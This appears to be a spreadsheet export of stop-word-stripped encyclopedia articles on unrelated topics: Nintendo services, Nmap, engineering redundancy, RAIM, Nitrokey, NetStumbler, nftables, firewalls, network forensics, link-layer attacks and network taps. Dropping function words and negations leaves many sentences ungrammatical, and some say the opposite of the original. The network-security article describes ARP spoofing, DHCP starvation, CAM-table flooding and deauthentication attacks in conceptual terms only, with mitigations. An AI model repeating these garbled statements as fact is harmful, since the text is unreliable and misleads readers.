launch alongside firmware update november 2012 north america november 2012 europe. browser functions multitasking application and, such, used another application, game, suspended background. browser primarily controlled gamepad's touchscreen controlled analog sticks scrolling zoom, d-pad cycle links page. browser supports html, css, javascript, html5 elements support flash, video, music files. however, play html5 video audio websites youtube. browser ability hide screen "virtual curtain" (which shows screens paused game), therefore allowing user browse internet much privacy gamepad. browser upload screenshot suspended software, either gamepad. exploit could software, including homebrew, card exploit internet browser malformed form newer updates, malformed video lower versions. loyalty programs nintendo network premium nintendo network premium (known deluxe digital promotion north america) loyalty program similar playstation plus offered playstation network. announced satoru iwata september 2012, japanese nintendo direct presentation. consumers purchased deluxe north america, premium pack europe australia, premium japan, received free two-year subscription service owners receive points digital purchase. members bought games apps nintendo eshop received percent price back form nintendo points, could subsequently towards future online purchases nintendo eshop. points equaled $5.00 consumers could toward purchase nintendo eshop. members received points purchases december 2014, could redeem points nintendo eshop cards march 2015. codes cards valid june 2015. club nintendo club nintendo loyalty program available nintendo's regions users register purchased nintendo products order exchange variety unique rewards. loyalty program free join committed providing rewards exchange consumer feedback, original purchase official nintendo products. once linked club nintendo, every product downloaded eshop automatically registered club nintendo account. user could also take survey product registered earn additional coins/stars, prizes could redeemed. discontinued north america june 2015, september 2015 regions, replaced another loyalty program called nintendo. rewards members club nintendo could earn credits (referred "coins" "stars" depending region) could traded special edition items available club nintendo. earning credits done primarily submitting codes found nintendo products systems, completing related surveys provided club nintendo websites. club nintendo reward items included playing cards, tote bags, downloadable physical games, various merchandise based nintendo's intellectual properties, special gaming accessories, limited promotions, warranty extensions select nintendo products. other services nintendo customer service us/europe/australia/japan/korea/south africa nintendo online store us/europe nintendo all-access nintendo network maintenance information/operational status also camp hyrule, nintendo's web-based community 1995 2007, adjunct nintendo power magazine randnet, nintendo's japanese internet dialup service community portal, based nintendo 64dd december 1999 february 2001 nintendo wi-fi connection wiiconnect24 nintendo switch online nintendo eshop playstation network xbox live nintendo network services, handles nintendo network operations nintendo network business development (nbd) notes references</t>
  </si>
  <si>
    <t>Nmap</t>
  </si>
  <si>
    <t>nmap (network mapper) network scanner created gordon lyon (also known pseudonym fyodor vaskovich). nmap used discover hosts services computer network sending packets analyzing responses.nmap provides number features probing computer networks, including host discovery service operating system detection. these features extensible scripts provide advanced service detection, vulnerability detection, features. nmap adapt network conditions including latency congestion scan. nmap started linux utility ported systems including windows, macos, bsd. popular linux, followed windows. features nmap features include: host discovery identifying hosts network. example, listing hosts respond and/or icmp requests particular port open. port scanning enumerating open ports target hosts. version detection interrogating network services remote devices determine application name version number. tcp/ip stack fingerprinting determining operating system hardware characteristics network devices based observations network activity said devices. scriptable interaction target using nmap scripting engine (nse) programming language.nmap provide information targets, including reverse names, device types, addresses.typical uses nmap: auditing security device firewall identifying network connections made identifying open ports target host preparation auditing. network inventory, network mapping, maintenance asset management. auditing security network identifying servers. generating traffic hosts network, response analysis response time measurement. finding exploiting vulnerabilities network. queries subdomain search user interfaces nmapfe, originally written kanchan, nmap's official nmap versions 4.22. nmap 4.50 (originally 4.22soc development series) nmapfe replaced zenmap, official graphical user interface based umit, developed adriano monteiro marques. web-based interfaces exists allow either controlling nmap analysing nmap results browser, ivre. output nmap provides four possible output formats. interactive output saved file. nmap output manipulated text processing software, enabling user create customized reports. interactive presented updated real time user runs nmap command line. various options entered scan facilitate monitoring. format processed tools. converted html report using xslt. grepable output tailored line-oriented processing tools grep, sed, awk. normal output seen running nmap command line, saved file. script kiddie meant amusing format interactive output replacing letters visually alike number representations. example, interesting ports becomes int3rest1ng p0rtz. this known leet. history nmap first published september 1997, article phrack magazine source-code included. with help contributions computer security community, development continued. enhancements included operating system fingerprinting, service fingerprinting, code rewrites c++), additional scan types, protocol support (e.g. ipv6, sctp), programs complement nmap's core features. major releases include: legal issues nmap tool used discover services running internet connected systems. like tool, could potentially used black hacking, precursor attempts gain unauthorized access computer systems; however, nmap also used security systems administrators assess networks vulnerabilities (i.e. white hacking). system administrators nmap search unauthorized servers, computers conform security standards.in jurisdictions, unauthorized port scanning illegal. license nmap originally distributed public license (gpl). later releases, nmap's authors added clarifications specific interpretations license felt unclear lacking. instance, nmap 3.50 specifically revoked license group distribute nmap software views sco-linux controversies.starting version 7.90, nmap transitions custom license npsl, dual-licensing versions 7.90, 7.91, 7.92 licenses. several linux distributions consider license non-free. popular culture matrix reloaded, trinity seen using nmap access power plant's computer system, allowing "physically" break building. appearance nmap film widely discussed internet forums hailed unusually realistic example hacking.nmap nmapfe used listening, 2006 movie former officer defects mounts clandestine counter-listening station high italian alps. nmap source code seen movie battle royale, well brief views command line version nmap executing live free hard bourne ultimatum. 2013, nmap continued make appearances movies including popular sci-fi movie elysium. film dredd, film adaptation famous judge dredd comics, released 2012 also contains multiple nmap scenes. nmap used network reconnaissance exploitation slum tower network. even seen briefly movie's trailer. command nmap widely used video game hacknet, allowing probe network ports target system hack snowden, nmap used aptitude test scene minutes movie. academia nmap integral part academic activities. used research involving tcp/ip protocol suite networking general. besides research tool, nmap also become research topic. examples also references bibliography external links official website</t>
  </si>
  <si>
    <t>Redundancy (engineering)</t>
  </si>
  <si>
    <t>engineering, redundancy duplication critical components functions system intention increasing reliability system, usually form backup fail-safe, improve actual system performance, case gnss receivers, multi-threaded computer processing. many safety-critical systems, fly-by-wire hydraulic systems aircraft, parts control system triplicated, formally termed triple modular redundancy (tmr). error component out-voted two. triply redundant system, system three components, three must fail system fails. since rarely fails, components expected fail independently, probability three failing calculated extraordinarily small; often outweighed risk factors, human error. redundancy also known terms "majority voting systems" "voting logic". redundancy sometimes produces less, instead greater reliability creates complex system prone various issues, lead human neglect duty, lead higher production demands overstressing system make less safe. forms redundancy computer science, four major forms redundancy: hardware redundancy, dual modular redundancy triple modular redundancy information redundancy, error detection correction methods time redundancy, performing operation multiple times multiple executions program multiple copies data transmitted software redundancy n-version programminga modified form software redundancy, applied hardware distinct functional redundancy, mechanical hydraulic braking car. applied case software, code written independently distinctly different producing results inputs.structures usually designed redundant parts well, ensuring part fails, entire structure collapse. structure without redundancy called fracture-critical, meaning single broken component cause collapse entire structure. bridges failed lack redundancy include silver bridge interstate bridge skagit river. parallel combined systems demonstrate different level redundancy. models subject studies reliability safety engineering. dissimilar redundancy unlike traditional redundancy, uses thing, dissimilar redundancy uses different things. idea different things unlikely contain identical flaws. voting method involve additional complexity things take different amounts time. dissimilar redundancy often used software, identical software contains identical flaws. chance failure reduced using least different types following processors, operating systems, software, sensors, types actuators (electric, hydraulic, pneumatic, manual mechanical, etc.) communications protocols, communications hardware, communications networks, communications paths geographic redundancy geographic redundancy corrects vulnerabilities redundant devices deployed geographically separating backup devices. geographic redundancy reduces likelihood events power outages, floods, hvac failures, lightning strikes, tornadoes, building fires, wildfires, mass shootings would disable system. geographic redundancy locations miles (100 continental, miles apart less miles (150 apart, less miles apart, campus, different buildings feet apart campus.the following methods reduce risks damage fire conflagration: large buildings least feet apart: high-rise buildings least feet apart: open spaces clear flammable vegetation within feet side objects different wings building, rooms separated feet different floors wing building rooms horizontally offset minimum feet fire walls rooms different floors rooms separated another room, leaving least 70-foot rooms minimum separated fire walls opposite sides corridorthe distant early warning line example geographic redundancy. those radar sites minimum miles apart, provided overlapping coverage. functions redundancy functions redundancy passive redundancy active redundancy. both functions prevent performance decline exceeding specification limits without human intervention using extra capacity. passive redundancy uses excess capacity reduce impact component failures. common form passive redundancy extra strength cabling struts used bridges. this extra strength allows structural components fail without bridge collapse. extra strength used design called margin safety. eyes ears provide working examples passive redundancy. vision loss cause blindness depth perception impaired. hearing loss cause deafness directionality lost. performance decline commonly associated passive redundancy limited number failures occur. active redundancy eliminates performance declines monitoring performance individual devices, monitoring used voting logic. voting logic linked switching automatically reconfigures components. error detection correction global positioning system (gps) examples active redundancy. electrical power distribution provides example active redundancy. several power lines connect generation facility customers. each power line includes monitors detect overload. each power line also includes circuit breakers. combination power lines provides excess capacity. circuit breakers disconnect power line monitors detect overload. power redistributed across remaining lines. toronto airport, redundant electrical lines. each lines supply enough power entire airport. spot network substation uses reverse current relays open breakers lines fail, lets power continue flow airport. electrical power systems power scheduling reconfigure active redundancy. computing systems adjust production output generating facility generating facilities suddenly lost. this prevents blackout conditions major events earthquake. fire alarms, burglary alarms, telephone central office exchanges, similar critical systems operate power. disadvantages charles perrow, author normal accidents, said sometimes redundancies backfire produce less, reliability. this happen three ways: first, redundant safety devices result complex system, prone errors accidents. second, redundancy lead shirking responsibility among workers. third, redundancy lead increased production pressures, resulting system operates higher speeds, less safely. voting logic voting logic uses performance monitoring determine reconfigure individual components operation continues without violating specification limitations overall system. voting logic often involves computers, systems composed items computers reconfigured using voting logic. circuit breakers example form non-computer voting logic. simplest voting logic computing systems involves components: primary alternate. they similar software, output alternate remains inactive normal operation. primary monitors periodically sends activity message alternate long everything outputs primary stop, including activity message, primary detects fault. alternate activates output takes primary brief delay activity message ceases. errors voting logic cause outputs active inactive time, cause outputs flutter off. reliable form voting logic involves number three devices more. perform identical functions outputs compared voting logic. voting logic establishes majority disagreement, majority deactivate output device(s) disagree. single fault interrupt normal operation. this technique used avionics systems, responsible operation space shuttle. calculating probability system failure each duplicate component added system decreases probability system failure according formula:- {\displaystyle {p}=\prod _{i=1}^{n}p_{i}} where: {\displaystyle number components {\displaystyle p_{i}} probability component failing {\displaystyle probability components failing (system failure)this formula assumes independence failure events. that means probability component failing given component already failed failing failed. there situations unreasonable, using power supplies connected socket power supply failed, would too. also assumes component needed keep system running. also references external links secure propulsion using advanced redundant control using powerline redundant communication channel flammini, francesco; marrone, stefano; mazzocca, nicola; vittorini, valeria (2009). modeling approach safety evaluation n-modular redundant computer systems presence imperfect maintenance". reliability engineering system safety. (9): 1422–1432. arxiv:1304.6656. doi:10.1016/j.ress.2009.02.014. s2cid 6932645.</t>
  </si>
  <si>
    <t>Redundant array of independent memory</t>
  </si>
  <si>
    <t>redundant array independent memory (raim) design feature found certain computers' main random access memory. raim utilizes additional memory modules striping algorithms protect failure particular module keep memory system operating continuously. raim similar concept redundant array independent disks (raid), protects failure disk drive, case memory supports several dram device chipkills entire memory channel failures. raim much robust parity checking memory technologies cannot protect many varieties memory failures. july 2010, introduced first high computer server featuring raim, zenterprise 196. each z196 machine contains (usable) raim-protected main memory. 2011 business class model z114 introduced also supporting raim. formal announcement letter offered additional information regarding implementation: ibm's robust error correction date found memory subsystem. redundant array independent memory (raim) technology introduced provide protection dynamic random access memory (dram), dual inline memory module (dimm), memory channel level. three full dram failures rank corrected. dimm level failures, including components controller application specific integrated circuit (asic), power regulators, clocks, board, corrected. memory channel failures signal lines, control lines, drivers/receivers corrected. upstream downstream data signals spared using spare wires upstream downstream paths. signals used spare clock signal line (one upstream downstream). together improvements designed deliver system resilient memory subsystem date. also mainframe references</t>
  </si>
  <si>
    <t>Nitrokey</t>
  </si>
  <si>
    <t>nitrokey open-source used enable secure encryption signing data. secret keys always stored inside nitrokey protects malware (such computer viruses) attackers. user-chosen tamper-proof smart card protect nitrokey case loss theft. hardware software nitrokey open-source. free software open hardware enables independent parties verify security device. nitrokey supported microsoft windows, macos, linux, bsd. history 2008 suhr, rudolf böddeker, another friend travelling found looking encrypted emails internet cafés, meant secret keys remain secure computer viruses. some proprietary dongles existed time, lacked certain ways. consequently, established open source project crypto stick august 2008 grew become nitrokey. spare-time project founders develop hardware solution enable secure usage email encryption. first version crypto stick released december 2009. late 2014, founders decided professionalize project, renamed nitrokey. nitrokey's firmware audited german cybersecurity firm cure53 2015, hardware audited company august 2015. first four nitrokey models became available september 2015. technical features several nitrokey models exist nitrokey flagship model. contains following features: secure storage support openpgp (popular individuals) s/mime (popular businesses) email encryption standards. nitrokey also used various party applications truecrypt veracrypt disk encryption. one-time passwords (which similar tans used secondary security measure addition ordinary passwords). supports hmac-based one-time password algorithm (hotp, 4226) time-based one-time password algorithm (totp, 6238), compatible google authenticator. client certificate authentication used administrate servers securely ssh, access virtual private networks openvpn. password safe stores encrypted static passwords inside nitrokey.the upcoming nitrokey storage provides features nitrokey additionally contains encrypted mass storage. characteristics nitrokey's secret keys stored securely internally. user-chosen protects case loss theft. nitrokey's tamper-proof design protects sophisticated physical attacks. keys 4096 aes-256 supported. supported microsoft windows, macos, linux, bsd. compatible many popular software like microsoft outlook, mozilla thunderbird, openssh. secure implementation nitrokey published open source open hardware enable independent reviews source code hardware layout ensure absence back doors security flaws. nitrokey's security dependent upon secret keys stored centrally device manufacturer. nitrokey published open source software, free software, open hardware. devices nitrokey start nitrokey nitrokey nitrokey storage 16gb nitrokey storage 32gb nitrokey storage 64gb nitrokey fido nitrokey fido2 philosophy nitrokey's developers believe proprietary systems cannot provide strong security security systems need open source. instance cases intercepts security devices shipped implanted backdoors 2011 hacked secret keys securid tokens stolen allowed hackers circumvent authentication. revealed 2010, many fips 140-2 level certified storage devices various manufacturers could easily cracked using default password. nitrokey, open source transparency, wants provide high secure system avoid security issues proprietary rivals facing. nitrokey's mission provide best open source security protect digital lives users. references external links official website</t>
  </si>
  <si>
    <t>Nintendo Account</t>
  </si>
  <si>
    <t>nintendo account single sign-on user account system used nintendo services various platforms. introduced february 2016, used account system nintendo-published mobile apps, well nintendo switch console (where succeeds nintendo network accounts used authentication nintendo nintendo services nintendo. nintendo account created using email address, login facebook, twitter, google account, apple existing nintendo network history prior death july 2015, then-nintendo president satoru iwata secured business alliance japanese mobile provider dena develop mobile titles based nintendo's first-party franchises. during presentation related business alliance march 2014, iwata announced membership program would jointly developed nintendo dena encompasses existing nintendo systems, smartphones tablets, well gaming platform development codenamed "nx". according iwata, membership service would "create connection nintendo individual consumer regardless device consumer uses."in anticipation launch nintendo's first app, miitomo, well launch loyalty program nintendo, nintendo account registration opened february 2016. nintendo account extended video game hardware march 2017 release nintendo switch, user profiles linked account services online multiplayer nintendo eshop. preparation release, nintendo account system introduced display names. system software (released september 2018 alongside nintendo switch online), nintendo accounts longer unlinked profiles switch console. nintendo eshop balances also merged nintendo network nintendo account profiles.in april 2020, nintendo confirmed 160,000 nintendo accounts affected leak nintendo network (nnid) user password information gained credential stuffing breaches, malicious users accounts purchase digital content owner's credit card stored payment. april 2020, nintendo disabled nnid means nintendo account, emails affected users change password, recommended users enable two-factor authentication nintendo account. availability pre-registration nintendo account began february 2016, markets. nintendo account required sign nintendo. march 2016, nintendo account, consequently nintendo, released markets, since released more. march 2019, nintendo account recognizes territories. similarly predecessor club nintendo, well nintendo eshop, nintendo network nintendo, nintendo account ip-restricted, users unlisted territories well listed territories lesser services) sign nintendo account service, country address different without known repercussions. however, persistent limits selected regional nintendo eshop choice applies. regardless, nintendo account supported territories club nintendo was, albeit many territories added later limited nintendo mobile support. references external links official website</t>
  </si>
  <si>
    <t>NetStumbler</t>
  </si>
  <si>
    <t>netstumbler (also known network stumbler) tool windows facilitates detection wireless lans using 802.11b, 802.11a 802.11g wlan standards. runs microsoft windows operating systems windows 2000 windows trimmed-down version called ministumbler available handheld windows operating system. netstumbler become popular programs wardriving wireless reconnaissance, although disadvantage. detected easily intrusion detection system, actively probes network collect information. netstumbler integrated support unit. with support, netstumbler displays coordinate information next information discovered network, useful finding specific networks sorted collected data.the program commonly used for: verifying network configurations finding locations poor coverage wlan detecting causes wireless interference detecting unauthorized ("rogue") access points aiming directional antennas long-haul wlan linksno updated version developed since 2004. also inssider created alternative network stumbler current generation windows operating system kismet linux, freebsd, netbsd, openbsd, kismac references external links netstumbler's author's website (stumbler.net)</t>
  </si>
  <si>
    <t>Nftables</t>
  </si>
  <si>
    <t>nftables subsystem linux kernel providing filtering classification network packets/datagrams/frames. available since linux kernel 3.13 released january 2014.nftables replaces legacy iptables portions netfilter. among advantages nftables iptables less code duplication easier extension protocols. nftables configured user-space utility nft, legacy tools configured utilities iptables, ip6tables, arptables ebtables frameworks. nftables utilizes building blocks netfilter infrastructure, existing hooks networking stack, connection tracking system, userspace queueing component, logging subsystem. command-line syntax command drop packets destination address 1.2.3.4: rule filter output daddr 1.2.3.4 drop note syntax differs significantly iptables, rule would written: iptables output 1.2.3.4 drop syntax appear verbose, also flexible. nftables incorporates advanced data structures dictionaries, maps concatenations exist iptables. making significantly reduce number chains rules needed express given packet filtering design. iptables-translate tool used translate many existing iptables rules equivalent nftables rules. debian (buster), among linux distributions, uses nftables along iptables-translate default packet filtering backend. history project first publicly presented netfilter workshop 2008 patrick mchardy netfilter core team. first preview release kernel userspace implementation given march 2009. although tool called "the biggest change linux firewalling since introduction iptables 2001", received little press attention. notable hacker fyodor vaskovich (gordon lyon) said "looking forward general release mainstream linux kernel".the project stayed alpha stage, official website removed 2009. march 2010, emails author project mailing lists showed project still active approaching beta release, latter never shipped officially. october 2012, pablo neira ayuso proposed compatibility layer iptables announced possible inclusion project mainstream kernel. october 2013, pablo neira ayuso submitted nftables core pull request linux kernel mainline tree. merged kernel mainline january 2014, release linux kernel version 3.13. overview nftables kernel engine adds simple virtual machine linux kernel, able execute bytecode inspect network packet make decisions packet handled. operations implemented virtual machine intentionally made basic. data packet itself, look associated metadata (inbound interface, example), manage connection-tracking data. arithmetic, bitwise comparison operators used making decisions based data. virtual machine also capable manipulating sets data (typically, addresses), allowing multiple comparison operations replaced single lookup.the above-described organization contrary iptables firewalling code, protocol awareness built-in deeply logic code replicated four times—for ipv4, ipv6, arp, ethernet bridging—as firewall engines protocol-specific used generic manner.the main advantages nftables iptables simplification linux kernel abi, reduction code duplication, improved error reporting, efficient execution, storage incremental changes filtering rules. traditionally used iptables(8), ip6tables(8), arptables(8) ebtables(8) (for ipv4, ipv6, ethernet bridging, respectively) intended replaced nft(8) single unified implementation, providing firewall configuration in-kernel virtual machine. nftables also offers improved userspace allows atomic replacements firewall rules within single netlink transaction. this speeds firewall configuration changes setups large rulesets; also help avoiding race conditions rule changes executed. nftables also includes compatibility features ease transition previous firewalls, command-line utilities convert rules iptables format, syntax-compatible versions iptables commands nftables backend. references external links official website nftables source code repository nftables howto documentation first release nftables (2009-03-18) pablo neira ayuso: [rfc] back nf_tables (plus compatibility layer) nftables quick howto nftables sections archwiki gentoo wiki corbet, jonathan (2009-03-24). "nftables: packet filtering engine". lwn.net. mchardy, patrick (2008-09-30). nftables successor iptables, ip6tables, ebtables arptables (odp). netfilter workshop 2008. nft_compat extended support ebtables extensions (merged linux kernel 4.0)</t>
  </si>
  <si>
    <t>Next-generation firewall</t>
  </si>
  <si>
    <t>next-generation firewall (ngfw) part third generation firewall technology, combining traditional firewall network device filtering functions, application firewall using in-line deep packet inspection (dpi), intrusion prevention system (ips). other techniques might also employed, tls/ssl encrypted traffic inspection, website filtering, qos/bandwidth management, antivirus inspection third-party identity management integration (i.e. ldap, radius, active directory). next-generation firewall versus traditional firewall ngfws include typical functions traditional firewalls packet filtering, network- port-address translation (nat), stateful inspection, virtual private network (vpn) support. goal next-generation firewalls include layers model, improving filtering network traffic dependent packet contents. ngfws perform deeper inspection compared stateful inspection performed first- second-generation firewalls. ngfws thorough inspection style, checking packet payloads matching signatures harmful activities exploitable attacks malware. evolution next-generation firewalls modern threats like web-based malware attacks, targeted attacks, application-layer attacks, significantly negative effect threat landscape. fact, malware intrusion attempts exploiting weaknesses applications, opposed weaknesses networking components services. stateful firewalls simple packet filtering capabilities efficient blocking unwanted applications applications port-protocol expectations. administrators could promptly prevent unsafe application accessed users blocking associated ports protocols. blocking application uses port closing port would also mean complications entire http protocol. protection based ports, protocols, addresses reliable viable. this development identity-based security approach, takes organizations step ahead conventional security appliances bind security ip-addresses. ngfws offer administrators deeper awareness control individual applications, along deeper inspection capabilities firewall. administrators create granular "allow/deny" rules controlling websites applications network. also network security unified threat management references</t>
  </si>
  <si>
    <t>Network forensics</t>
  </si>
  <si>
    <t>network forensics sub-branch digital forensics relating monitoring analysis computer network traffic purposes information gathering, legal evidence, intrusion detection. unlike areas digital forensics, network investigations deal volatile dynamic information. network traffic transmitted lost, network forensics often pro-active investigation.network forensics generally uses. first, relating security, involves monitoring network anomalous traffic identifying intrusions. attacker might able erase files compromised host; network-based evidence might therefore evidence available forensic analysis. second form relates enforcement. case analysis captured network traffic include tasks reassembling transferred files, searching keywords parsing human communication emails chat sessions. systems commonly used collect network data; brute force "catch can" intelligent "stop look listen" method. overview network forensics comparatively field forensic science. growing popularity internet homes means computing become network-centric data available outside disk-based digital evidence. network forensics performed standalone investigation alongside computer forensics analysis (where often used reveal links digital devices reconstruct crime committed).marcus ranum credited defining network forensics "the capture, recording, analysis network events order discover source security attacks problem incidents".compared computer forensics, evidence usually preserved disk, network data volatile unpredictable. investigators often material examine packet filters, firewalls, intrusion detection systems anticipate breaches security.systems used collect network data forensics usually come forms: "catch-it-as-you-can" this packets passing certain traffic point captured written storage analysis done subsequently batch mode. this approach requires large amounts storage. "stop, look listen" this packet analyzed rudimentary memory certain information saved future analysis. this approach requires faster processor keep incoming traffic. types ethernet data layer allows user filter different events. with tools, website pages, email attachments, network traffic reconstructed transmitted received unencrypted. advantage collecting data directly connected host. example address address host certain time known, data sent address filtered. establish connection address, useful take closer look auxiliary network protocols. address resolution protocol (arp) tables list addresses corresponding addresses. collect data layer, network interface card (nic) host "promiscuous mode". doing, traffic passed cpu, traffic meant host. however, intruder attacker aware connection might eavesdropped, might encryption secure connection. almost impossible nowadays break encryption fact suspect's connection another host encrypted time might indicate host accomplice suspect. tcp/ip network layer internet protocol (ip) responsible directing packets generated network (e.g., internet) adding source destination information interpreted routers network. cellular digital packet networks, like gprs, similar protocols like methods described work well. correct routing, every intermediate router must routing table know send packet next. these routing tables best sources information investigating digital crime trying track attacker. this, necessary follow packets attacker, reverse sending route find computer packet came (i.e., attacker). encrypted traffic analytics given proliferation encryption internet, april 2021 estimated half malware uses evade detection. encrypted traffic analysis inspects traffic identify encrypted traffic coming malware threats detecting suspicious combinations characteristics, usually uncommon networks servers. another approach encrypted traffic analysis uses generated database fingerprints, although techniques criticized easily bypassed hackers inaccurate. internet internet rich source digital evidence including browsing, email, newsgroup, synchronous chat peer-to-peer traffic. example, server logs used show suspect accessed information related criminal activity. email accounts often contain useful evidence; email headers easily faked and, network forensics used prove exact origin incriminating material. network forensics also used order find using particular computer extracting user account information network traffic. wireless forensics wireless forensics sub-discipline network forensics. main goal wireless forensics provide methodology tools required collect analyze (wireless) network traffic presented valid digital evidence court law. evidence collected correspond plain data broad usage voice-over-ip (voip) technologies, especially wireless, include voice conversations. analysis wireless network traffic similar wired networks, however added consideration wireless security measures. references external links overview network forensic tools datasets (2021) forensics wiki (2010) network forensic tools, network computing december 2004</t>
  </si>
  <si>
    <t>Network interface layer security</t>
  </si>
  <si>
    <t>network interface layer, also commonly referred data link layer link layer, lowest layer tcp/ip model. this particular layer several unique security vulnerabilities exploited determined adversary. network interface layer network interface layer, commonly referred data link layer, physical interface host system network hardware. defines data packets formatted transmission routings. some common link layer protocols include ieee 802.2 x.25. data link layer associated protocols govern physical interface host computer network hardware. goal layer provide reliable communications hosts connected network. some services provided layer network stack include: data framing breaking data stream individual frames packets. checksums sending checksum data frame enable receiving node determine whether frame received error-free. acknowledgment sending either positive (data received) negative (data received expected) acknowledgement receiver sender ensure reliable data transmission. flow control buffering data transmissions ensure fast sender overwhelm slower receiver. vulnerabilities mitigation strategies wired networks content address memory (cam) table exhaustion attack data link layer addresses data packets based destination hardware's physical media access control (mac) address. switches within network maintain content address tables (cams) maps switch's ports specific addresses. these tables allow switch securely deliver packet intended physical address only. using switch connect systems communicating provides much greater security network hub, broadcasts traffic ports, allowing eavesdropper intercept monitor network traffic. table exhaustion attack basically turns switch hub. attacker floods table mac-to-port mappings table's fixed memory allotment full. point switch longer knows deliver traffic based mac-to-port mapping, defaults broadcasting traffic ports. adversary able intercept monitor network traffic traversing switch include passwords, emails, instant messages, etc.the table-overflow attack mitigated configuring port security switch. this option provides either specification addresses particular switch port specification number addresses learned switch port. when invalid address detected port, switch either block offending address shut port. address routing protocol (arp) spoofing data link layer logical address assigned network layer translated physical address. order ensure reliable data communications switches network must maintain up-to-date tables mapping logical (ip) physical (mac) addresses. client switch unsure ip-to-mac mapping data packet receives send address resolution protocol (arp) message nearest switch asking address associated particular address. once accomplished client switch update table reflect mapping. spoofing attack adversary broadcasts address machine attacked along address. neighboring switches update mapping tables begin transmitting data destined attacked system's address attacker's address. such attack commonly referred "man middle" attack. defenses spoofing generally rely form certification cross-checking responses. uncertified responses blocked. these techniques integrated dynamic host configuration protocol (dhcp) server dynamic static addresses certified. this capability also implemented individual hosts integrated ethernet switches network equipment. dynamic host configuration protocol (dhcp) starvation when client system without address enters network request address resident dhcp server. dhcp server reserve address anyone else asking granted one) send address device along lease identifying long address valid. normally, point, device respond confirming address dhcp server dhcp server finally responds acknowledgement. dhcp starvation attack, adversary receives address lease period dhcp server, adversary respond confirmation. instead, adversary floods dhcp server address requests addresses within server's address space reserved (exhausted). point, hosts wishing join network denied access, resulting denial service. adversary rogue dhcp server clients receive incorrect network settings result transmit data attacker's machine.one method mitigating type attack source guard feature available many ethernet switches. guard initially blocks traffic except dhcp packets. when client receives valid address dhcp server address switch port relationship bound access control list (acl). restricts traffic addresses configured binding. wireless networks hidden node attack wireless network many hosts nodes sharing common medium. nodes wireless laptop computers communicating office environment physical separation require communicate wireless access point. device transmit time order avoid packet collisions. prior transmitting, node sends ready send (rts) signal. receiving traffic access point broadcast clear send (cts) signal network. node begin transmitting node knows hold transmitting data time being. even though cannot directly communicate node i.e. node hidden, knows wait based communication access point. attacker exploit functionality flooding network messages. then every node assumes hidden node trying transmit hold transmissions, resulting denial service.preventing hidden node attacks requires network tool netequalizer. such tool monitors access point traffic develops baseline level traffic. spikes cts/rts signals assumed result hidden node attack subsequently blocked. de-auth (de-authentication) attack client entering wireless network must first authenticate access point (ap) thereafter associated access point. when client leaves sends deauthentication, deauth, message disassociate access point. attacker send deauth messages access point tied client addresses thereby knocking users off-line requiring continued re-authenticate, giving attacker valuable insight reauthentication handshaking occurs.to mitigate attack, access point delay effects deauthentication disassociation requests (e.g., queuing requests 5–10 seconds) thereby giving access point opportunity observe subsequent packets client. data packet arrives deauthentication disassociation request queued, request discarded since legitimate client would never generate packets order. references</t>
  </si>
  <si>
    <t>Red Ring of Death</t>
  </si>
  <si>
    <t>Network tap</t>
  </si>
  <si>
    <t>network system monitors events local network. typically dedicated hardware device, provides access data flowing across computer network. network least) three ports: port, port, monitor port. inserted passes traffic (send receive data streams) unimpeded real time, also copies data monitor port, enabling third party listen. network taps commonly used network intrusion detection systems, voip recording, network probes, rmon probes, packet sniffers, monitoring collection devices software require access network segment. taps used security applications non-obtrusive, detectable network (having physical logical address), deal full-duplex non-shared networks, usually pass bypass traffic even stops working loses power. terminology term network analogous phone vampire tap. some vendors define acronym test access point terminal access point; however, backronyms. monitored traffic sometimes referred pass-through traffic, ports used monitoring monitor ports. there also aggregation port full-duplex traffic, wherein traffic aggregated traffic, resulting stream data monitoring full-duplex communication. packets must aligned single stream using time-of-arrival algorithm. vendors tend terms marketing breakout, passive, aggregating, regeneration, bypass, active, inline power, others; unfortunately, vendors terms consistently. before buying product important understand available features, check vendors read product literature closely figure marketing terms correspond reality. "vendor terms" common within industry, real definitions valuable points consideration buying device. distributed network taps report centralized monitoring system packet analyzer. tapping technology methods there various methods monitoring network. many tapping methods used, according network technology, monitoring objective, resources available size target network. various methods developed below. tapping software this type tapping focuses tapping making software, without making significant change infrastructures hardware. this type tapping often cheapest implement, needs several implementations give truly complete look network. monitoring software simplest type monitoring logging interesting device running programs commands show performance statistics data. this cheapest monitor network, highly appropriate small networks. however, scale well large networks. also impact network monitored; observer effect. snmp another monitor devices remote management protocol snmp devices performance. this scales well, necessarily appropriate types monitoring. inherent problems snmp polling effect. many vendors alleviated using intelligent polling schedulers, still affect performance device monitored. also opens host potential security problems. port mirroring another method monitor networks port mirroring (called "span", switched port analyzer, vendors cisco, given names, mlxe telemetry brocade communications vendors)(also known mirror port) monitoring protocol tzsp routers switches. this low-cost alternative network taps solves many problems. however, routers switches support port mirroring, and, using port mirroring affect performance router switch. these technologies also subject problem full-duplex described elsewhere article, often limits router switch many pass-through sessions monitored, many monitor ports (generally two) monitor given session. often, span port overloaded, packets dropped reaching monitoring device. there also possibility losing error packets causing problems. data sent monitoring device dropped, impossible troubleshoot, matter advanced device used. promiscuous sniffer this tapping method consists enabling promiscuous mode device used monitoring attaching network hub. this works well older technologies 10base2, fddi, token ring. networks, host automatically hosts enabling promiscuous mode. however, modern switched network technologies create point-to-point links pairs devices, making impossible network traffic method. tapping hardware this type tapping focuses tapping remarkable hardware in-line sniffer this method consists installation device network cable device admin/attacker wishes "tap". when monitoring device installed in-line, network stop every time device fails, shutsdown. "victim" device might stop receiving traffic tapping-device updating/rebooting said mechanisms integrated smart (aka. would prevent scenario happening). some taps, particularly fiber taps, power electronics pass-through monitor portion network traffic. this means never suffer kind electronics failure power failure results loss network connectivity. work, fiber-based network technologies, divides incoming light using simple physical apparatus outputs, pass-through, monitor. this called passive tap. other taps power electronics pass-through, power electronics monitor port. these also referred passive. v-line tapping v-line tapping important tapping system methods. v-line tapping (also known bypass tapping) allows placing served system virtually in-line. putting device in-line compromise integrity critical network. placing tapping system instead monitoring device connecting monitoring device tapping system, guarantee traffic continue flow device create failure point network. this method always passes every packet, even error packets span port drop, monitoring device. this method involves using spying-software target machine. system-admin, type solution easiest implement cost-effective one; however, attacker, type tapping risky, easily detectable system scans. tapping system removed reboot spying software installed non-persistent system executing live-os. advantages features modern network technologies often full-duplex, meaning data travel directions time. network link allows mbit/s data flow direction time, means network really allows mbit/s aggregate throughput. this present problem monitoring technologies monitor port. therefore, network taps full-duplex technologies usually monitor ports, half connection. listener must channel bonding link aggregation merge connections aggregate interface halves traffic. other monitoring technologies, passive fiber network taps deal well full-duplex traffic. once network place, network monitored without interfering network itself. other network monitoring solutions require in-band changes network 